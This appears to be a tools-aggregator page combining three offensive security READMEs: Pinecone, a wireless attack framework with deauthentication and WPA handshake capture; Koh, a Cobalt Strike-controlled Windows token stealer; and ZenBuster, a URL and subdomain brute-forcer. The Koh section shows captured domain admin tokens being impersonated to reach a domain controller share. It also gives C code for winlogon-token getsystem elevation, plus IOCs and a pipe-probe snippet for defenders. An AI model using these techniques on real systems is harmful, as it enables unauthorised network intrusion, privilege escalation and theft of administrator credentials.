pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, which can be seen by typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in the background (for example, scripts/infrastructure/ap), you can stop it using the stop command while the module is running.

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



Koh - The Token Stealer


Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.

Some code was inspired by Elad Shamir's Internal-Monologue project (no license), as well as KB180548. For why this is possible and Koh's approach, see the Technical Background section of this README.

For a deeper explanation of the motivation behind Koh and its approach, see the Koh: The Token Stealer post.

@harmj0y is the primary author of this code base. @tifkin_ helped with the approach, BOF implementation, and some token mechanics.

Koh is licensed under the BSD 3-Clause license.


Koh Server

The Koh "server" captures tokens and uses named pipes for control/communication. This can be wrapped in Donut and injected into any high-integrity SYSTEM process (see The Inline Shenanigans Bug).

Compilation

We are not planning on releasing binaries for Koh, so you will have to compile yourself :)

Koh has been built against .NET 4.7.2 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build. The Koh.exe assembly and Koh.bin Donut-built PIC will be output to the main directory. The Donut blob is both x86/x64 compatible, and is built with the following options using v0.9.3 of Donut at ./Misc/Donut.exe:

  [ Instance type : Embedded
[ Entropy : Random names + Encryption
[ Compressed : Xpress Huffman
[ File type : .NET EXE
[ Parameters : capture
[ Target CPU : x86+amd64
[ AMSI/WDLP : abort

Donut's license is BSD 3-clause.

Usage

Koh.exe <list | monitor | capture> [GroupSID1 GroupSID2 ...]

  • list - lists (non-network) logon sessions
  • monitor - monitors for new/unique (non-network) logon sessions
  • capture - captures one unique token per SID found for new (non-network) logon sessions

Group SIDs can be supplied on the command line as well, causing Koh to monitor/capture only logon sessions that contain the specified group SIDs in their negotiated token information.

Example - Listing Logon Sessions

C:\Temp>Koh.exe list

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: list

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Origin LUID : 1677733 (0x1999a5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:51:46 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Example - Monitoring for Logon Sessions (with group SID filtering)

Only lists results that have the domain admins (-512) group SID in their token information:

C:\Temp>Koh.exe monitor S-1-5-21-937929760-3187473010-80948926-512

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: monitor

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM

[*] Targeting group SIDs:
S-1-5-21-937929760-3187473010-80948926-512

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\DA
LUID : 81492608
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Origin LUID : 1677765 (0x1999c5)

[*] New Logon Session - 6/22/2022 2:52:17 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Origin LUID : 999 (0x3e7)

Koh Client

The current usable client is a Beacon Object File at .\Clients\BOF\. Load the .\Clients\BOF\KohClient.cna aggressor script in your Cobalt Strike client to enable BOF control of the Koh server. The only requirement for using captured tokens is SeImpersonatePrivilege. The communication named pipe has an "Everyone" DACL but uses a basic shared password (super securez).

To compile fresh on Linux using Mingw, see the .\Clients\BOF\build.sh script. The only requirement (on Debian at least) should be apt-get install gcc-mingw-w64

Usage

beacon> help koh
koh list - lists captured tokens
koh groups LUID - lists the group SIDs for a captured token
koh filter list - lists the group SIDs used for capture filtering
koh filter add SID - adds a group SID for capture filtering
koh filter remove SID - removes a group SID from capture filtering
koh filter reset - resets the SID group capture filter
koh impersonate LUID - impersonates the captured token with the given LUID
koh release all - releases all captured tokens
koh release LUID - releases the captured token for the specified LUID
koh exit - signals the Koh server to exit

Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.

Server:

C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : testuser@THESHIRE.LOCAL
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : da@THESHIRE.LOCAL
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : localadmin@THESHIRE.LOCAL
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : da@THESHIRE.LOCAL
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
S-1-5-21-937929760-3187473010-80948926-513
S-1-5-21-937929760-3187473010-80948926-512
S-1-5-21-937929760-3187473010-80948926-525
S-1-5-21-937929760-3187473010-80948926-572

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> PerfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is established on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned to the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the information described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists for it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was applied back to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.

Approach

Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege; however, this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're now presented with another problem: given a "leaked"/held-open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.

Advantages/Disadvantages Versus Traditional Credential Extraction

Advantages

  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.

Disadvantages

  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, existing ticket/credential extraction can still be done on the leaked logon session.
  • May cause instability if a large number of sessions are leaked, though this can be mitigated with token group SID filtering and by restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time. This is one of the weirder and more frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails ¯\_(ツ)_/¯

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle appears identical to the working cases, but the call still errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.

IOCs

To quote @tifkin_ "Everything is stealthy until someone is looking for it." While Koh's approach is slightly different than others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts, it opens a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is "password", so sending "password list" to any \\.\pipe\imposecost pipe will let you confirm whether Koh is indeed running. The default impersonation pipe used is \\.\pipe\imposingcost.
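
As a rough illustration, a defender could poke the pipe like this. The wire format (default password followed by the list command as a single plain-text message) is an assumption based on the description above, so treat this as a sketch to adapt rather than a ready-made scanner:

// Sketch: check for a live Koh server via its default named pipe.
#include <windows.h>
#include <stdio.h>

int main(void)
{
    HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\imposecost",
                              GENERIC_READ | GENERIC_WRITE,
                              0, NULL, OPEN_EXISTING, 0, NULL);
    if (pipe == INVALID_HANDLE_VALUE) {
        printf("imposecost pipe not present (Koh probably not running)\n");
        return 0;
    }
    const char msg[] = "password list";   // default password + command (assumed format)
    DWORD n = 0;
    WriteFile(pipe, msg, sizeof(msg) - 1, &n, NULL);
    char reply[4096] = {0};
    if (ReadFile(pipe, reply, sizeof(reply) - 1, &n, NULL) && n > 0)
        printf("Koh responded:\n%.*s\n", (int)n, reply);
    CloseHandle(pipe);
    return 0;
}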

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is used to perform a getsystem-type elevation.
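
That pattern is the classic winlogon token-duplication trick. A stripped-down sketch (assuming SeDebugPrivilege is held and the winlogon PID has already been located; not Koh's exact code) looks roughly like:

// Sketch: getsystem by cloning and impersonating winlogon's token.
#include <windows.h>

BOOL GetSystemViaWinlogon(DWORD winlogonPid)
{
    HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, winlogonPid);
    if (!proc) return FALSE;

    HANDLE token = NULL, dupToken = NULL;
    BOOL ok = OpenProcessToken(proc, TOKEN_DUPLICATE | TOKEN_QUERY, &token) &&
              DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL,
                               SecurityImpersonation, TokenImpersonation, &dupToken) &&
              ImpersonateLoggedOnUser(dupToken);  // thread now runs as SYSTEM

    if (dupToken) CloseHandle(dupToken);
    if (token) CloseHandle(token);
    CloseHandle(proc);
    return ok;
}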

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions, or the AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext combination, particularly AcquireCredentialsHandle calls that specify a LUID) could be explored for effectiveness, but alas, I am not an EDR.

TODO

  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug


Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool


ZenBuster is a multi-threaded, multi-platform URL enumeration tool written in Python by Zach Griffin (@0xTas).

I wrote this tool as a way to deepen my familiarity with Python, and to help increase my understanding of cybersecurity tooling in general. ZenBuster may not be the fastest or most comprehensive tool of its kind. It is, however, simple to use, decently flexible, and in practice only marginally slower than other "tried-and-true" tools like Gobuster. Personally, I have been using it to help me solve CTF challenges on platforms like TryHackMe, and have found my implementation to be satisfactorily reliable.

This software is intended for use in CTF challenges, or by security professionals to gather information on their targets:

  • It is capable of brute-force enumerating subdomains and also URI resources (directories/files).
  • Both methods of enumeration require use of an appropriate wordlist or dictionary file.
  • Features Include:
    1. Hostname format supports standard names, IPv4, and IPv6.
    2. Support for logging results to a file with -O [filename].
    3. Specifying custom ports for nonstandard webservers with -p.
    4. Optional file extensions in directory mode with -x.
    5. Quiet mode for less distracting output with -Q.
    6. Colored output can be disabled with -nc, and the lolcat banner with -nl.
    7. Tested on Python versions 3.9 and 3.10, with theoretical support for versions >= 3.6.

CAUTION/DISCLAIMER

ZenBuster is capable of producing a potentially unwelcome number of HTTP requests in a short amount of time.

The developers and contributors are not liable or responsible for any damage caused by misuse or abuse of this software.

Please Enumerate Responsibly!

License


ZenBuster is licensed under the GNU GPLv3 License; see here for more information.

Credits

The Yin-Yang ASCII art in the banners was created by Joan G. Stark (jgs) and Hayley Jane Wakenshaw (hjw). Modifications were made by me, where marked with 'zg'.


Installation

Firstly, ensure that Python version >= 3.6 is installed, then clone the repository with:

git clone https://github.com/0xTas/zenbuster.git

Next, cd zenbuster.

Dependencies

ZenBuster relies on three external libraries to function; it is recommended to install them with:

pip install -r requirements.txt

The modules that will be installed and their purposes are as follows:

  1. Python requests

    • The backbone of each enumeration request. Without this, the script will not function.
  2. termcolor

    • Enables colored terminal output. Non-critical, the script can still run without color if this is not present.
  3. colorama (Windows only)

    • Primes the Windows terminal to accept ANSI color codes (from termcolor). Non-critical.

These dependencies may be installed manually, with pip using requirements.txt, or via interaction with the script upon first run.


Usage

Once dependencies have been installed, you can run the program in the following ways:

On Linux (+Mac?):

./zenbuster.py [options] or python3 zenbuster.py [options]

On Windows:

python zenbuster.py [options]

[Options]

Short Flag    | Long Flag    | Purpose
-h            | --help       | Displays the help screen and exits
-d            | --dirs       | Enables Directory Enumeration Mode
-s            | --ssl        | Forces usage of HTTPS in requests
-v            | --verbose    | Prints verbose info to terminal/log
-q            | --quiet      | Minimal terminal output until final results
-nc           | --no-color   | Disables colored terminal output
-nl           | --no-lolcat  | Disables lolcat-printed banner (Linux only)
-u <hostname> | --host       | Host to target for the scan
-w <wordlist> | --wordlist   | Path to wordlist/dictionary file
-x <exts>     | --ext        | Comma-separated list of file extensions (Dirs only)
-p <port#>    | --port       | Custom port option for nonstandard webservers
-o [filename] | --out-file   | Log results to a file (accepts custom name/path)

Example Usage

./zenbuster.py -d -w /usr/share/wordlists/dirb/common.txt -u target.thm -v

python3 zenbuster.py -w ../subdomains.txt --host target.thm --ssl -O myResults.log

zenbuster -w subdomains.txt -u target.thm --quiet (With .bashrc alias)


Planned Features/Improvements

  • Increased levels of optional verbosity.
  • Allow optional throttling of task thread-count.
  • Allow users to modify the list of ignored status codes.
  • Allow greater user control over various request headers.
  • Allow optional ignoring of responses based on content-length.
  • Expand subdomain enumeration to include OSINT methods instead of just brute-forcing.
  • Explore a more comprehensive and source-readable solution to fancy colored output (possibly using rich).

Known Issues/Limitations

  • Enumerating long endpoints may result in ugly terminal output due to line-wrapping in smaller console windows. Logging to a file is recommended, especially on Windows.
  • If the target host is a vHost on a shared webserver, enumeration via IP may not function as expected. Use the domain/hostname instead.

